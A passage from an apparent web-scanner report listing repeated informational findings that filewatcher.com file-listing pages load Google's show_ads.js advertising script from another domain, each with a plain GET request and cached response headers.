Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.32469.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32469.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:17 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "44be+G2/Nb+wI+zEZHCvpA"
Content-Length: 19369
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 765
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.997. http://www.filewatcher.com/m/aub-2.0.5.tgz.32470.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.32470.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32470.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:28 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Tyr6lm+Qnki2QK4YsJffzg"
Content-Length: 19531
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 776
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.998. http://www.filewatcher.com/m/aub-2.0.5.tgz.32471.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.32471.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32471.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:24 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ifUTv9SpIvdsVXEMGHc0sA"
Content-Length: 19480
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 770
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.999. http://www.filewatcher.com/m/aub-2.0.5.tgz.32472.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.32472.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32472.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:15 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "84U4dCKLsk1Z+aOAvuuTBw"
Content-Length: 19024
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 763
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1000. http://www.filewatcher.com/m/aub-2.0.5.tgz.32473.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.32473.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32473.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:14 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "IVQsFoHz1k0Mbag9DHc9Zw"
Content-Length: 19153
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 763
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1001. http://www.filewatcher.com/m/aub-2.0.5.tgz.32474.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.32474.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32474.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:27 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "GU55O58VehxXeXOVB1+efA"
Content-Length: 19315
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:27 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 772
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1002. http://www.filewatcher.com/m/aub-2.0.5.tgz.32475.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.32475.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32475.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:44 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Pzqi5BoPu2SDkEkb7fcIug"
Content-Length: 17232
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 774
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1003. http://www.filewatcher.com/m/aub-2.0.5.tgz.32476.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.32476.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32476.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:23 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "z11CQyjEcYH6sVxRd8t7Xw"
Content-Length: 19228
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:23 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 770
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1004. http://www.filewatcher.com/m/aub-2.0.5.tgz.32477.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.32477.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32477.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:35 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "8ffVe5Yw96HX+lrDpWFvgQ"
Content-Length: 19321
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1005. http://www.filewatcher.com/m/aub-2.0.5.tgz.32478.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.32478.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32478.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:45 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "eaWnWH2Unu2z9hlKe3WZsw"
Content-Length: 16294
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1006. http://www.filewatcher.com/m/aub-2.0.5.tgz.32479.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.32479.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32479.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:40 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "l/qYQ9I11wIEKGo32Abp4g"
Content-Length: 19117
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 778
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1007. http://www.filewatcher.com/m/aub-2.0.5.tgz.32480.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.32480.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32480.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:45 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "wxDGX5Sir3nBJNAckUcH9g"
Content-Length: 17211
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 776
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1008. http://www.filewatcher.com/m/aub-2.0.5.tgz.32517.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.32517.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32517.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:29 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "vBDNbFbot6fUTE88pSE2xQ"
Content-Length: 19672
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:29 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 775
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1009. http://www.filewatcher.com/m/aub-2.0.5.tgz.32553.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.32553.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32553.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:46 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "MawCGbO7kVMZsu7w+c2URQ"
Content-Length: 15420
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 778
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1010. http://www.filewatcher.com/m/aub-2.1.3.tar.gz.55334.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.1.3.tar.gz.55334.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.1.3.tar.gz.55334.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:32 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "+H2eqPipPt1yf+Xwx5R+nA"
Content-Length: 19018
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 778
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.1.3.tar.gz - FTP Mirror Se
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1011. http://www.filewatcher.com/m/aub-2.1.3.tbz.20.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.1.3.tbz.20.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.1.3.tbz.20.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:16 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "AuuYbjQrpUnv0gYJ0p9FCw"
Content-Length: 23865
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:16 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 764
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.1.3.tbz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1012. http://www.filewatcher.com/m/aub-2.1.3.tgz.20.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.1.3.tgz.20.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.1.3.tgz.20.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:31 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "gYAj054prPxdrHQLER8LJg"
Content-Length: 22326
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:31 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 775
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.1.3.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1013. http://www.filewatcher.com/m/aub-2.2.tbz.18.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.2.tbz.18.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.18.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
